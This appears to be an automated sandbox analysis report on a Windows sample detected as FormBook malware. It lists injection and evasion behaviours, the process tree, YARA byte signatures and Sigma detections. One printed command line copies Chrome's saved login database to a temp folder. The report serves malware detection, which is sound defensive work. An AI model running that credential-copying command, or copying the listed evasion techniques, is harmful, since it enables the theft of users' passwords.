Play interactive tour

Edit tour

Analysis Report 11-27.exe

Overview

General Information

Sample Name:	11-27.exe
Analysis ID:	324075
MD5:	4312f55eb22b6cd52d0f6f93f40215af
SHA1:	a0439365d1f3e47d03729760aaaafd5f10991d53
SHA256:	4b5650a097c6a9ee7bc32fb5aa691ce1d1f358bcbdcbccfc6ba66d2f76f612af
Tags:	exe
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected FormBook malware

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Steal Google chrome login data

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Suspicious Svchost Process

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Uses netstat to query active network connections and open ports

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Startup

System is w10x64

11-27.exe (PID: 772 cmdline: 'C:\Users\user\Desktop\11-27.exe' MD5: 4312F55EB22B6CD52D0F6F93F40215AF)

explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

Hmptdrv.exe (PID: 6152 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe' MD5: 4312F55EB22B6CD52D0F6F93F40215AF)

Hmptdrv.exe (PID: 6332 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe' MD5: 4312F55EB22B6CD52D0F6F93F40215AF)

msdt.exe (PID: 6492 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)

cmd.exe (PID: 6640 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

NETSTAT.EXE (PID: 6516 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)

svchost.exe (PID: 6844 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\tpmH.url	Methodology_Shortcut_HotKey	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x9e:$hotkey: \x0AHotKey=1 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\tpmH.url	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x14:$file: URL= 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\tpmH.url	Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x73:$icon: IconFile= 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.430498820.0000000002E67000.00000020.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0xde8:$file: URL= 0xdcc:$url_explicit: [InternetShortcut]
00000005.00000002.430498820.0000000002E67000.00000020.00000001.sdmp	Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0xe14:$icon: IconFile= 0xdcc:$url_explicit: [InternetShortcut]
00000000.00000002.420259807.0000000002E97000.00000020.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0xde8:$file: URL= 0xdcc:$url_explicit: [InternetShortcut]
00000000.00000002.420259807.0000000002E97000.00000020.00000001.sdmp	Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0xe14:$icon: IconFile= 0xdcc:$url_explicit: [InternetShortcut]
00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.416538189.0000000003247000.00000020.00000001.sdmp	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0xde8:$file: URL= 0xdcc:$url_explicit: [InternetShortcut]
00000002.00000002.416538189.0000000003247000.00000020.00000001.sdmp	Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0xe14:$icon: IconFile= 0xdcc:$url_explicit: [InternetShortcut]
00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa500:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa77a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1629d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15d89:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1639f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16517:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb192:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x15004:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xbe8b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c10f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d122:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x19031:$sqlite3step: 68 34 1C 7B E1 0x19144:$sqlite3step: 68 34 1C 7B E1 0x19060:$sqlite3text: 68 38 2A 90 C5 0x19185:$sqlite3text: 68 38 2A 90 C5 0x19073:$sqlite3blob: 68 53 D8 7F 8C 0x1919b:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa630:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa8aa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x163cd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15eb9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x164cf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16647:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb2c2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x15134:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xbfbb:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c23f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d252:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x19161:$sqlite3step: 68 34 1C 7B E1 0x19274:$sqlite3step: 68 34 1C 7B E1 0x19190:$sqlite3text: 68 38 2A 90 C5 0x192b5:$sqlite3text: 68 38 2A 90 C5 0x191a3:$sqlite3blob: 68 53 D8 7F 8C 0x192cb:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa630:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa8aa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x163cd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15eb9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x164cf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16647:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb2c2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x15134:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xbfbb:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c23f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d252:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x19161:$sqlite3step: 68 34 1C 7B E1 0x19274:$sqlite3step: 68 34 1C 7B E1 0x19190:$sqlite3text: 68 38 2A 90 C5 0x192b5:$sqlite3text: 68 38 2A 90 C5 0x191a3:$sqlite3blob: 68 53 D8 7F 8C 0x192cb:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: Hmptdrv.exe PID: 6152	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 41 entries

Sigma Overview

System Summary:

Sigma detected: Steal Google chrome login data

Show sources

Source: Process started

Author: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\msdt.exe, ParentImage: C:\Windows\SysWOW64\msdt.exe, ParentProcessId: 6492, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 6640

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6844

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6844

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe

ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Show sources

Source: 11-27.exe	Virustotal: Detection: 28%			Perma Link
Source: 11-27.exe	ReversingLabs: Detection: 68%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp, type: MEMORY
